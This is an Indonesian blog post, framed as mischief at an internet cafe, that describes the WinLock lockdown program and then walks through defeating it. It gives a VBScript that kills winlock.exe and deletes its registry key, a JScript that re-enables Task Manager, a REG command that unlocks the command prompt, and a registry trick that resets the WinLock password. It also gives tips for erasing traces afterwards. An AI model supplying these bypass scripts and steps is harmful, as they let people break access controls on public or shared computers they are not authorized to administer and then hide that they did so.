Winlock

Blogroll

Enigmatic

Enigmatic


“buat iseng di Warnet”..
WinLock adalah sebuah program keamanan yang menyeluruh untuk pribadi atau komputer yang dapat diakses publik menjalankan semua versi Windows dari 95 hingga Vista. Ini adalah sebuah program yang memastikan bahwa hanya orang-orang yang berwenang dapat mengakses informasi yang sensitif pada komputer Anda.

Alat keamanan ini memungkinkan Anda untuk membatasi user dari mengakses sumber daya sistem yang penting seperti Control Panel, Desktop, dan sistem registry, menonaktifkan Windows hotkeys (seperti Ctrl-Alt-Del, Alt-Tab, Ctrl-Esc, dll), menyembunyikan tombol Start dan Taskbar.

Dengan WinLock Anda dapat mengontrol berapa lama orang lain dapat menggunakan komputer Anda. Ini berjalan dari system tray dan membutuhkan password untuk mendapatkan akses ke pengaturan yang tersedia.

Ini beban secara otomatis dengan Windows dan memungkinkan Anda untuk menambahkan opsional pesan startup, memberikan pemberitahuan audio, dan menetapkan batas waktu. Setelah bahwa batas tersebut tercapai, Windows ringkasnya ditutup. Anda dapat mengaktifkan dan menonaktifkan timer dari nampan.

Hal ini juga memungkinkan Anda menolak akses ke file yang dipilih, aplikasi, dan jendela Explorer (Recycle Bin, My Computer, dll), usb dan hard drive, filter konten internet dan melarang akses ke situs-situs Web yang patut dipertanyakan. Bila diaktifkan, tidak ada jalan lain tanpa password yang tepat.

Apakah Anda khawatir tentang rekan kerja yang terjadi di jaringan dan mendapatkan akses tanpa izin ke file pribadi Anda, atau anak-anak Anda mengacaukan file pekerjaan Anda, WinLock adalah sebuah perangkat lunak-satunya solusi untuk kebutuhan keamanan anda.

“Tapi walaupun demikian pasti punya kelemahan dan bisa diakalin tuk menjebol nya…
caranya :

Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..

Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..

OK langsung aj yah, udah dibuka notepad/wordpad ?

Usahakan cek dulu ada deepfreeze atau kagak. 🙂

Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.

Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini

strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next

Const HKEY_CLASSES_ROOT = &H80000000

strComputer = “.”

Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.

Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.

Keterangan :

Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?

Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).

Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.

Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.

Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt.

Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.

Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.

Misalkan berada di folder C:\program files\winlockpro

Ketik C: lalu enter Ketik cd program files lalu enter

Ketik cd winlockpro lalu enter

Dan ketik winlock.exe lalu enter

TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.

Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin =p

Cara reset Password Winlock
* buka dulu taskmanager dikomputermu.trus Kill Process yang namanya winlock.exe (di End Proses).

* klo Udah … buka regedit (start > run > ketik regedit)

cari :

HKEY_CLASSES_ROOT\CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

ubah string ID menjadi ID1.setelah itu log off komputermu dan masuk kembali.

Dan Lihat APA YANG TERJADI SETELAH ITU … ?? JREENGG !!

klik icon winlock yang ada disudut kanan bawah komputermu.danwinlock itu akan meminta password baru. kesimpulannya passwordnya sudah direset, tinggal masukkan password baru …. huahahahah … >:)

* seperti biasa jika ingin menghilangkan jejak hapus kembali string yang tela dibuat di

HKEY_CLASSES_ROOT\CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID
ID dan ganti kembali ID1 menjadi ID ( jangan lupa sebelumnya harus di shutdown winlockpro, tidak perlu ctrl + alt +del lagi .. 🙂

* jika ternyata taskmanager nya sudah didisable oleh administrator, maka hal itu bisa diatasi dengan software yaitu UnlockThemAll.software tersebut dapat membuat taskmanager,command prompt(CMD), dll dapat di enable kembali.

  1. Belum ada komentar.
  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: